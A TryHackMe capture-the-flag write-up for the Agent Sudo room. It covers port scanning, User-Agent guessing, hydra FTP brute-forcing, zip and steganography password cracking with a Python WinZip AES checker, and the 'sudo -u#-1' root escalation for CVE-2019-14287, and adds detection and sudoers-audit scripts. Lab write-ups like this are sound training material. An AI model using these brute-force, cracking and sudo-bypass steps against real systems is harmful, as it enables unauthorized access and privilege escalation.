TryHackMe: Agent Sudo Writeup

Writeup and notes for the TryHackMe room Agent Sudo.


Task 2: Enumerate

How many open ports?

└─$ nmap -Pn -A
Starting Nmap 7.94SVN ( ) at 2024-05-20 09:41 EDT
Nmap scan report for
Host is up (0.30s latency).
Not shown: 997 closed tcp ports (conn-refused)
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Annoucement
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 38.92 seconds


How you redirect yourself to a secret page?

On accessing the site, I found the following message.

 Dear agents, 

 Use your own codename as user-agent to access the site. 

 Agent R


What is the agent name?


Setting the User-Agent to R, I found the message "What are you doing! Are you one of the 25 employees? If not, I going to report this incident" in the server's response.

└─$ curl -i -H "User-Agent: R"       
HTTP/1.1 200 OK
Date: Mon, 20 May 2024 13:53:43 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=UTF-8

What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>

        Dear agents,
        Use your own <b>codename</b> as user-agent to access the site.
        Agent R

Changing the User-Agent value to A, B, C and so on, the server's response changed when the User-Agent was C.

curl -i -H "User-Agent: C"
HTTP/1.1 302 Found
Date: Mon, 20 May 2024 13:55:05 GMT
Server: Apache/2.4.29 (Ubuntu)
Location: agent_C_attention.php
Content-Length: 218
Content-Type: text/html; charset=UTF-8

<!DocType html>

        Dear agents,
        Use your own <b>codename</b> as user-agent to access the site.
        Agent R


Attention chris,

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!

Agent R 

From the above, Agent C's name turned out to be chris.
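The server above keys its behaviour on the User-Agent header, so on the defender's side this step shows up as one client cycling through one-letter User-Agent values. The following is an added example, not part of the original writeup: it parses Apache combined-format access log lines (the sample lines are constructed, modelled on the requests above) and flags source IPs that present several distinct very short User-Agent strings.

```python
import re
from collections import defaultdict

# Apache "combined" log format; the sample lines below are constructed, not from the room.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

SAMPLE_LOG = """\
10.0.0.5 - - [20/May/2024:13:53:43 +0000] "GET / HTTP/1.1" 200 310 "-" "R"
10.0.0.5 - - [20/May/2024:13:54:10 +0000] "GET / HTTP/1.1" 200 310 "-" "A"
10.0.0.5 - - [20/May/2024:13:54:31 +0000] "GET / HTTP/1.1" 200 310 "-" "B"
10.0.0.5 - - [20/May/2024:13:55:05 +0000] "GET / HTTP/1.1" 302 218 "-" "C"
10.0.0.5 - - [20/May/2024:13:55:06 +0000] "GET /agent_C_attention.php HTTP/1.1" 200 233 "-" "C"
10.0.0.9 - - [20/May/2024:13:56:00 +0000] "GET / HTTP/1.1" 200 310 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
"""


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_ua_enumeration(lines, max_len=2, min_distinct=3):
    """Map source IP -> sorted distinct short User-Agent values, for IPs that sent
    at least `min_distinct` different User-Agents of `max_len` characters or fewer.
    Real browsers never send such values, so several distinct ones from one client
    is a strong sign of header guessing. "-" (header absent) is ignored."""
    short_uas = defaultdict(set)
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue
        ua = rec["ua"]
        if ua != "-" and 0 < len(ua) <= max_len:
            short_uas[rec["ip"]].add(ua)
    return {ip: sorted(uas) for ip, uas in short_uas.items() if len(uas) >= min_distinct}


if __name__ == "__main__":
    for ip, uas in find_ua_enumeration(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {len(uas)} distinct short User-Agents {uas}")
```

The thresholds are deliberately low because the signal is so unusual; on a busy site you would also key on the 302 to the per-agent page, which only a correctly guessed header triggers.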

Task 3: Hash cracking and brute-force

FTP password


hydra -l "chris" -P /usr/share/wordlists/rockyou.txt -V -f
[21][ftp] host:   login: chris   password: crystal


Zip file password


└─$ tnftp ftp://chris:crystal@
Connected to
220 (vsFTPd 3.0.3)
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||21348|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
-rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
-rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png



Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.

Agent C

Apparently Agent J's login password is hidden inside the image file.


└─$ strings -n 8 cutie.png| more          
8">;&@B&A>9RO =:#<A
.A0,"oS I


└─$ binwalk -e cutie.png     

0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
869           0x365           Zlib compressed data, best compression

WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [Errno 2] No such file or directory: 'jar', 'jar xvf '%e'' might not be installed correctly
34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820         0x8804          End of Zip archive, footer length: 22

└─$ unzip -Z           
Zip file size: 280 bytes, number of entries: 1
-rw-r--r--  6.3 unx       86 Bx u099 19-Oct-29 20:29 To_agentR.txt
1 file, 86 bytes uncompressed, 86 bytes compressed:  0.0%


I decided to crack the password with John the Ripper.


└─$ zip2john > zip.hash                   
└─$ file zip.hash 
zip.hash: ASCII text
└─$ cat zip.hash
$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$

Cracking the hash with John the Ripper.

john zip.hash
└─$ john zip.hash                                                                 
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 AVX 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien            (     
1g 0:00:00:01 DONE 2/3 (2024-05-20 10:24) 0.8547g/s 37986p/s 37986c/s 37986C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
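Why john finished this in about a second: a $zip2$ line is a WinZip AES record, and a candidate password is checked with PBKDF2-HMAC-SHA1 at only 1000 iterations against a 2-byte verifier, then confirmed with an HMAC-SHA1 tag over the ciphertext. The following is an added example, not code from the writeup or from John the Ripper: it parses the zip2john line shown above (field order: type, mode, magic, salt, verifier, data length, data, auth code) and runs that check over a small constructed candidate list standing in for a wordlist.

```python
import hashlib
import hmac

# The zip2john line exactly as printed on this page (WinZip AES entry for To_agentR.txt).
ZIP2JOHN_HASH = (
    "$zip2$*0*1*0*4673cae714579045*67aa*4e*"
    "61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e"
    "0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad"
    "32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$"
)

# Constructed candidate list standing in for a wordlist.
CANDIDATES = ["123456", "password", "agentR", "alien"]


def parse_zip2john(h):
    """Split a $zip2$ line into its fields:
    $zip2$*type*mode*magic*salt*verifier*datalen*data*authcode*$/zip2$
    mode 1/2/3 = AES-128/192/256, which fixes the key (16/24/32 B) and salt (8/12/16 B) sizes."""
    parts = h.split("*")
    if len(parts) != 10 or parts[0] != "$zip2$" or parts[-1] != "$/zip2$":
        raise ValueError("not a $zip2$ hash")
    mode = int(parts[2])
    key_len = 8 * (mode + 1)
    rec = {
        "key_len": key_len,
        "salt": bytes.fromhex(parts[4]),
        "verifier": bytes.fromhex(parts[5]),   # 2-byte password verification value
        "data_len": int(parts[6], 16),         # what john reports as "Cost 1 (HMAC size)"
        "data": bytes.fromhex(parts[7]),       # the encrypted file body
        "auth": bytes.fromhex(parts[8]),       # HMAC-SHA1 tag truncated to 10 bytes
    }
    if len(rec["salt"]) != key_len // 2 or len(rec["data"]) != rec["data_len"]:
        raise ValueError("inconsistent salt or data length")
    return rec


def check_password(rec, password, iterations=1000):
    """WinZip AE-2 check: PBKDF2-HMAC-SHA1 -> enc key | auth key | 2-byte verifier.
    The cheap verifier comparison rejects almost every wrong guess; the HMAC over the
    ciphertext rules out the 1-in-65536 verifier collision."""
    dk = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), rec["salt"],
                             iterations, dklen=2 * rec["key_len"] + 2)
    auth_key = dk[rec["key_len"]:2 * rec["key_len"]]
    if not hmac.compare_digest(dk[-2:], rec["verifier"]):
        return False
    tag = hmac.new(auth_key, rec["data"], hashlib.sha1).digest()[:10]
    return hmac.compare_digest(tag, rec["auth"])


def crack(rec, candidates):
    """Return the first candidate that passes both checks, or None."""
    for pw in candidates:
        if check_password(rec, pw):
            return pw
    return None


if __name__ == "__main__":
    rec = parse_zip2john(ZIP2JOHN_HASH)
    print("PBKDF2 iterations: 1000, key length:", rec["key_len"], "bytes")
    print("cracked:", crack(rec, CANDIDATES))
```

The 1000-iteration count is fixed by the format, so the only defence for an archive that must be password-protected is a passphrase that does not appear in any wordlist; a 5-letter dictionary word offers none.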



└─$ 7z x   

7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20
 64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024

Scanning the drive for archives:
1 file, 280 bytes (1 KiB)

Extracting archive:
Path =
Type = zip
Physical Size = 280

Enter password (will not be echoed):
Everything is Ok

Size:       86
Compressed: 280


Agent C,

We need to send the picture to 'QXJlYTUx' as soon as possible!

Agent R

steg password



└─$ stegseek --crack cute-alien.jpg /usr/share/wordlists/rockyou.txt output.txt
StegSeek 0.6 -

[i] Found passphrase: "Area51"           
[i] Original filename: "message.txt".
[i] Extracting to "output.txt".


Who is the other agent (in full name)?


Hi james,

Glad you find this message. Your login password is hackerrules!

Don't ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,


SSH password

From the previous question, user james's SSH password is hackerrules!

Task 4: Capture the user flag

What is the user flag?


└─$ ssh james@
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:rt6rNpPo1pGMkl4PRRE7NaQKAHV+UNkS9BfrCy8jVCA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
james@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)

 * Documentation:
 * Management:
 * Support:

 System information disabled due to load higher than 1.0

75 packages can be updated.
33 updates are security updates.

Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ pwd
james@agent-sudo:~$ whoami


james@agent-sudo:~$ ls -la
total 80
drwxr-xr-x 4 james james  4096 Oct 29  2019 .
drwxr-xr-x 3 root  root   4096 Oct 29  2019 ..
-rw-r--r-- 1 james james 42189 Jun 19  2019 Alien_autospy.jpg
-rw------- 1 root  root    566 Oct 29  2019 .bash_history
-rw-r--r-- 1 james james   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james  3771 Apr  4  2018 .bashrc
drwx------ 2 james james  4096 Oct 29  2019 .cache
drwx------ 3 james james  4096 Oct 29  2019 .gnupg
-rw-r--r-- 1 james james   807 Apr  4  2018 .profile
-rw-r--r-- 1 james james     0 Oct 29  2019 .sudo_as_admin_successful
-rw-r--r-- 1 james james    33 Oct 29  2019 user_flag.txt

What is the incident of the photo called?


scp -r james@ .


Searching for the image showed that the incident is called the Roswell Alien Autopsy.

Task 5: Privilege escalation

CVE number for the escalation (Format: CVE-xxxx-xxxx)


First, I tried sudo -l.

james@agent-sudo:~$ sudo -l
[sudo] password for james: 
Matching Defaults entries for james on agent-sudo:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on agent-sudo:
    (ALL, !root) /bin/bash


james@agent-sudo:~$ sudo bash
Sorry, user james is not allowed to execute '/bin/bash' as root on agent-sudo.
james@agent-sudo:~$ sudo /bin/bash
Sorry, user james is not allowed to execute '/bin/bash' as root on agent-sudo.

The (ALL, !root) /bin/bash entry in the sudo -l output looked odd, so I searched for it and arrived at a PoC for CVE-2019-14287.
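The (ALL, !root) runas list is the precondition for CVE-2019-14287: on affected sudo versions (before 1.8.28) a runas spec that allows ALL and then excludes users by negation does not actually prevent a run as uid 0, and even on a patched sudo it is a weak way to express "any user but root". The following is an added example, not part of the writeup: a small sudoers auditor run over a constructed sample modelled on the sudo -l output above. The parser is a simplification of sudoers syntax (one user specification per line, no aliases, no line continuations).

```python
import re

# One user specification per line: user host=(runas[:groups]) [TAG:] commands.
# Host is restricted to [^=\s]+ so the "=" separator is found reliably.
SPEC_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

# Constructed sample sudoers, modelled on the room's sudo -l output.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults env_reset, mail_badpass
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
backup  ALL=(www-data) NOPASSWD: /usr/bin/rsync
alice   ALL=(ALL) ALL
"""


def parse_user_specs(text):
    """Return a list of {user, host, runas_users, cmds} for each user specification."""
    specs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = SPEC_RE.match(line)
        if not m:
            continue
        runas = m.group("runas") or ""
        # "(users:groups)" -> only the user part matters for this check
        users = [u.strip() for u in runas.split(":", 1)[0].split(",") if u.strip()]
        specs.append({"user": m.group("user"), "host": m.group("host"),
                      "runas_users": users, "cmds": m.group("cmds").strip()})
    return specs


def find_cve_2019_14287_exposure(specs):
    """Return the sudo users whose runas list allows ALL and relies on negated
    entries (such as !root) to carve out exceptions. On sudo < 1.8.28 that
    exclusion is bypassable (CVE-2019-14287); the robust fix is to upgrade sudo
    and to list the intended target accounts explicitly instead of ALL minus some."""
    exposed = []
    for s in specs:
        users = s["runas_users"]
        allows_all = "ALL" in users
        has_negation = any(u.startswith("!") for u in users)
        if allows_all and has_negation:
            exposed.append(s["user"])
    return exposed


if __name__ == "__main__":
    specs = parse_user_specs(SAMPLE_SUDOERS)
    for user in find_cve_2019_14287_exposure(specs):
        print(f"{user}: runas list allows ALL with a negated exception; review sudo version and policy")
```

For the entry in this room, a policy that really meant "james may get a shell as any service account" would list those accounts in the runas spec rather than writing ALL and subtracting root.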

What is the root flag?


james@agent-sudo:~$ sudo -u#-1 /bin/bash
[sudo] password for james: 
root@agent-sudo:~# whoami
root@agent-sudo:~# id
uid=0(root) gid=1000(james) groups=1000(james)


root@agent-sudo:~# ls -la /root
total 32
drwx------  4 root root 4096 Oct 29  2019 .
drwxr-xr-x 24 root root 4096 Oct 29  2019 ..
-rw-------  1 root root 1952 Oct 29  2019 .bash_history
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Oct 29  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  197 Oct 29  2019 root.txt
drwx------  2 root root 4096 Oct 29  2019 .ssh

(Bonus) Who is Agent R?

Agent R's real name was written at the end of root.txt.
